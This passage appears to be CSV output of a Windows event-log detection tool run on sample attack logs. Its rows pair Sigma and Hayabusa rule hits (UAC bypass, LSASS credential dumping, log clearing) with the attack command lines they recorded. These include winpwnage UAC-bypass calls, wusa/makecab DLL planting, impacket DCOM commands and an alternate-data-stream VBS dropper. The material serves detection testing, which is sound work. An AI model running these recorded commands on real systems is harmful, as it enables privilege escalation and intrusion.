Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.449 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.449 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\mmc.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,MMC Spawning Windows Shell,,rules/sigma/process_creation/win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 05:35:13.543 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx +2019-05-01 07:48:59.260 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\vssvc.exe : Path: C:\Windows\System32\VSSVC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:09.760 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Installer\MSI4FFD.tmp"" : Path: C:\Windows\Installer\MSI4FFD.tmp : User: IEWIN7\IEUser : Parent Command: 
C:\Windows\system32\msiexec.exe /V",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:09.760 +09:00,IEWIN7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:10.198 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\Installer\MSI4FFD.tmp""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:49:10.198 +09:00,IEWIN7,1,medium,Always Install Elevated MSI Spawned Cmd And Powershell,,rules/sigma/process_creation/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: cmd,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-01 07:52:27.588 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx +2019-05-02 23:48:53.950 +09:00,IEWIN7,3,low,PowerShell Network 
Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-02 23:50:17.955 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_3_10_Invoke-Mimikatz_hosted_Github.evtx +2019-05-03 02:21:42.678 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privilegedebug-tokenelevate-hashdump.evtx +2019-05-04 00:20:20.711 +09:00,SANS-TBT570,1102,high,Security log was cleared,User: student,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-04 00:20:27.359 +09:00,SANS-TBT570,4672,informational,Admin Logon,User: tbt570 : LogonID: 0x1861f7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-04 00:20:28.308 +09:00,SANS-TBT570,4634,informational,Logoff,User: tbt570 : LogonID: 
0x1861f7,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-pwshpayload.evtx +2019-05-08 12:00:11.778 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_security_dcshadow_4742.evtx +2019-05-09 10:59:28.684 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:28.950 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 10:59:29.090 +09:00,IEWIN7,1,critical,UAC Bypass via Event 
Viewer,,rules/sigma/process_creation/process_creation_sysmon_uac_bypass_eventvwr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 11:00:01.794 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\wsqmcons.exe : Path: C:\Windows\System32\wsqmcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UAC_Bypass_EventVwrBypass.evtx +2019-05-09 11:07:51.131 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" /kickoffelev : Path: C:\Windows\System32\sdclt.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:08:00.446 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:08:00.446 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_13_1_UACBypass_SDCLTBypass.evtx +2019-05-09 11:52:18.844 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Users\IEUser\AppData\Local\Temp\wscript.exe.manifest C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.922 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.953 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:18.969 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:19.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\uf3huvkczgk.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.250 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" C:\Windows\System32\wscript.exe 
C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.265 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.281 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.297 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:21.594 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\wusa.exe"" C:\Users\IEUser\AppData\Local\Temp\oz5ctxorxp4.tmp /extract:C:\Windows /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: 
powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /C ""echo Dim objShell:Dim oFso:Set oFso = CreateObject(""Scripting.FileSystemObject""):Set objShell = WScript.CreateObject(""WScript.Shell""):command = ""powershell.exe"":objShell.Run command, 0:command = ""C:\Windows\System32\cmd.exe /c """"start /b """""""" cmd /c """"timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest"""""""""":objShell.Run command, 0:Set objShell = Nothing > ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 11:52:23.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /C ""C:\Windows\wscript.exe ""C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"""" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_15_WScriptBypassUAC.evtx +2019-05-09 12:25:24.896 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdclt.exe"" : Path: C:\Windows\System32\sdclt.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-09 12:25:25.067 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /name Microsoft.BackupAndRestoreCenter : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent 
Command: ""C:\Windows\system32\sdclt.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-09 12:25:25.067 +09:00,IEWIN7,1,medium,Sdclt Child Processes,,rules/sigma/process_creation/sysmon_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_UACBypass_AppPath_Control.evtx +2019-05-10 21:21:57.077 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 7 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 21:22:08.465 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\users\ieuser\appdata\local\temp\system32\mmc.exe"" ""c:\users\ieuser\appdata\local\temp\system32\perfmon.msc"" : Path: C:\Users\IEUser\AppData\Local\Temp\system32\mmc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\perfmon.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_12_11_perfmonUACBypass.evtx +2019-05-10 22:32:48.200 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 9 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:32:58.549 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\CompMgmtLauncher.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami /priv : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""c:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:33:29.424 +09:00,IEWIN7,1,high,Run Whoami Showing Privileges,,rules/sigma/process_creation/win_whoami_priv.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_compmgmtlauncherUACBypass.evtx +2019-05-10 22:49:29.586 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:39.930 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p 
c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:40.164 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:45.133 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe"" : Path: C:\Windows\System32\cliconfg.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-10 22:49:45.378 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cliconfg.exe"" : Path: C:\Windows\System32\cliconfg.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx +2019-05-11 18:50:08.248 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:13.494 
+09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:18.404 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:18.654 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:26.779 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe"" : Path: C:\Windows\ehome\Mcx2Prov.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-11 18:50:27.018 +09:00,IEWIN7,1,informational,Process 
Creation,"Command: ""C:\Windows\ehome\mcx2prov.exe"" : Path: C:\Windows\ehome\Mcx2Prov.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx +2019-05-12 01:46:10.125 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:15.500 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p 